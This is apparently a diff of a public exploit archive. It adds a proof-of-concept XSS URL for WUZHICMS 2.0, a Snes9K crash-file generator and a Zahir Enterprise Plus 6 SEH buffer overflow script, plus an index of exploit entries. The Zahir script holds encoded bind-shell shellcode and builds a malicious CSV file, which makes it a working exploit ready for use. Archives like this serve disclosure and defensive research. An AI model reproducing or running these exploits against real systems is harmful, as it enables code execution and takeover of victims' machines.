+# Date: 2018-10-01
+# Vendor: http://www.wuzhicms.com
+# Software: WUZHICMS 2.0
+# CVE: CVE-2018-17832
+ 
+# Technical Details & Description:
+# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
+# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.
+   
+# PoC
+
+http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
+
+http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>

exploits/windows_x86/local/45504.py

@@ -0,0 +1,20 @@
+# Exploit Title: Snes9K 0.0.9z - Denial of Service (PoC)
+# Date: 2018-09-28
+# Exploit Author: crash_manucoot
+# Vendor Homepage: https://sourceforge.net/projects/snes9k/
+# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
+# Version: 0.0.9z
+# Tested on: Windows 7 Home Premium x86 SPANISH
+# Category: Windows Local Exploit
+# How to use: open the program go to Netplay-Options-paste the contents of open.txt 
+# in the Socket Port Number and Boom 
+
+buffer = "A" * 260
+nseh = "B" * 4 
+seh = "C" * 4 
+junk = "D" * 300
+
+evil = buffer + nseh + seh + junk
+
+file = open('open.txt','w+')
+file.write(evil)

exploits/windows_x86/local/45505.py

@@ -0,0 +1,86 @@
+# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
+# Google Dork: -
+# Date: 2018-09-28
+# Exploit Author: modpr0be
+# Vendor Homepage: http://www.zahiraccounting.com/
+# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
+# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
+# Tested on: Windows 7 x86/64bit
+# CVE : N/A
+# Category: local & privilege escalation
+#
+# Description
+# Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file. 
+# The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which 
+# caused the Zahir main program to crash.
+#
+# Credits to f3ci, who found the vulnerability.
+#
+# Proof of Concept
+#!/usr/bin/python
+ 
+import struct
+ 
+# msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0a\x0d\x22\x2c' \
+# -n 20 -e x86/shikata_ga_nai -f python -v sc
+# we won't worry about the space, it's big enough!
+# badchars are 00,0a,0d,22,2c
+sc =  ""
+sc += "\x92\x91\xf5\x99\x98\xf5\xd6\x48\x48\x3f\x2f\x99\x4a"
+sc += "\x42\x9f\x2f\x42\x43\x43\x42\xb8\x8c\xa3\xb1\xa0\xdd"
+sc += "\xc0\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x53\x31\x43\x12"
+sc += "\x83\xc3\x04\x03\xcf\xad\x53\x55\x33\x59\x11\x96\xcb"
+sc += "\x9a\x76\x1e\x2e\xab\xb6\x44\x3b\x9c\x06\x0e\x69\x11"
+sc += "\xec\x42\x99\xa2\x80\x4a\xae\x03\x2e\xad\x81\x94\x03"
+sc += "\x8d\x80\x16\x5e\xc2\x62\x26\x91\x17\x63\x6f\xcc\xda"
+sc += "\x31\x38\x9a\x49\xa5\x4d\xd6\x51\x4e\x1d\xf6\xd1\xb3"
+sc += "\xd6\xf9\xf0\x62\x6c\xa0\xd2\x85\xa1\xd8\x5a\x9d\xa6"
+sc += "\xe5\x15\x16\x1c\x91\xa7\xfe\x6c\x5a\x0b\x3f\x41\xa9"
+sc += "\x55\x78\x66\x52\x20\x70\x94\xef\x33\x47\xe6\x2b\xb1"
+sc += "\x53\x40\xbf\x61\xbf\x70\x6c\xf7\x34\x7e\xd9\x73\x12"
+sc += "\x63\xdc\x50\x29\x9f\x55\x57\xfd\x29\x2d\x7c\xd9\x72"
+sc += "\xf5\x1d\x78\xdf\x58\x21\x9a\x80\x05\x87\xd1\x2d\x51"
+sc += "\xba\xb8\x39\x96\xf7\x42\xba\xb0\x80\x31\x88\x1f\x3b"
+sc += "\xdd\xa0\xe8\xe5\x1a\xc6\xc2\x52\xb4\x39\xed\xa2\x9d"
+sc += "\xfd\xb9\xf2\xb5\xd4\xc1\x98\x45\xd8\x17\x34\x4d\x7f"
+sc += "\xc8\x2b\xb0\x3f\xb8\xeb\x1a\xa8\xd2\xe3\x45\xc8\xdc"
+sc += "\x29\xee\x61\x21\xd2\x01\x2e\xac\x34\x4b\xde\xf8\xef"
+sc += "\xe3\x1c\xdf\x27\x94\x5f\x35\x10\x32\x17\x5f\xa7\x3d"
+sc += "\xa8\x75\x8f\xa9\x23\x9a\x0b\xc8\x33\xb7\x3b\x9d\xa4"
+sc += "\x4d\xaa\xec\x55\x51\xe7\x86\xf6\xc0\x6c\x56\x70\xf9"
+sc += "\x3a\x01\xd5\xcf\x32\xc7\xcb\x76\xed\xf5\x11\xee\xd6"
+sc += "\xbd\xcd\xd3\xd9\x3c\x83\x68\xfe\x2e\x5d\x70\xba\x1a"
+sc += "\x31\x27\x14\xf4\xf7\x91\xd6\xae\xa1\x4e\xb1\x26\x37"
+sc += "\xbd\x02\x30\x38\xe8\xf4\xdc\x89\x45\x41\xe3\x26\x02"
+sc += "\x45\x9c\x5a\xb2\xaa\x77\xdf\xc2\xe0\xd5\x76\x4b\xad"
+sc += "\x8c\xca\x16\x4e\x7b\x08\x2f\xcd\x89\xf1\xd4\xcd\xf8"
+sc += "\xf4\x91\x49\x11\x85\x8a\x3f\x15\x3a\xaa\x15"
+ 
+junk = "A" * 3041
+junk += '\n\r'
+junk += 'A' * 380
+junk += "\xeb\x08\x90\x90"	# nseh
+junk += struct.pack('<L',0x52016661) #seh pop ecx # pop ebp # ret 0x04 (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+junk += '\x90\x90\x90\x90'
+junk += sc
+junk += "D" * (5000-len(junk))
+
+print """
+#===============================================================================#
+|					   ____              __ 		             				|
+|					  / __/__  ___ ___  / /____ _______ _ 						|
+|					 _\ \/ _ \/ -_) _ \/ __/ -_) __/ _ `/						|
+|					/___/ .__/\__/_//_/\__/\__/_/  \_,_/ 						|
+|					   /_/                                          			|
+|                                                               				|
+|	Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day)	|
+|   	                      CVE-2018-17408            						|
+|       	   by modpr0be & f3ci (research[at]spentera.com)   					|
+#===============================================================================#
+"""
+print "[+] Preparing for file.."
+f = open('exploit.csv', 'w')
+print "[+] Writing exploit code on a CSV file.."
+f.write(junk)
+f.close()
+print "[+] Success writing file.. bring to Mr. Zahir."

files_exploits.csv

@@ -10006,6 +10006,9 @@ id,file,description,date,author,type,platform,port
 45497,exploits/linux/local/45497.txt,"Linux Kernel - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath Local Privilege Escalation",2018-09-26,"Google Security Research",local,linux,
 45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows,
 45503,exploits/windows_x86-64/local/45503.txt,"PCProtect 4.8.35 - Privilege Escalation",2018-09-28,"Hashim Jawad",local,windows_x86-64,
+45504,exploits/windows_x86/local/45504.py,"Snes9K 0.0.9z - Denial of Service (PoC)",2018-10-01,crash_manucoot,local,windows_x86,
+45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86,
+45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40044,3 +40047,13 @@ id,file,description,date,author,type,platform,port
 45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
 45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
 45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
+45506,exploits/java/webapps/45506.py,"H2 Database 1.4.196 - Remote Code Execution",2018-10-01,h4ckNinja,webapps,java,
+45507,exploits/java/webapps/45507.txt,"ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting",2018-10-01,"Ismail Tasdelen",webapps,java,
+45508,exploits/php/webapps/45508.txt,"Fork CMS 5.4.0 - Cross-Site Scripting",2018-10-01,"Ismail Tasdelen",webapps,php,
+45509,exploits/php/webapps/45509.txt,"Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
+45510,exploits/php/webapps/45510.txt,"Education Website 1.0 - 'subject' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
+45511,exploits/php/webapps/45511.txt,"Singleleg MLM Software 1.0 - 'msg_id' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
+45512,exploits/php/webapps/45512.txt,"Binary MLM Software 1.0 - 'pid' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
+45513,exploits/php/webapps/45513.txt,"Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
+45514,exploits/php/webapps/45514.txt,"WUZHICMS 2.0 - Cross-Site Scripting",2018-10-01,Renzi,webapps,php,
+45515,exploits/hardware/webapps/45515.txt,"Billion ADSL Router 400G 20151105641 - Cross-Site Scripting",2018-10-01,cakes,webapps,hardware,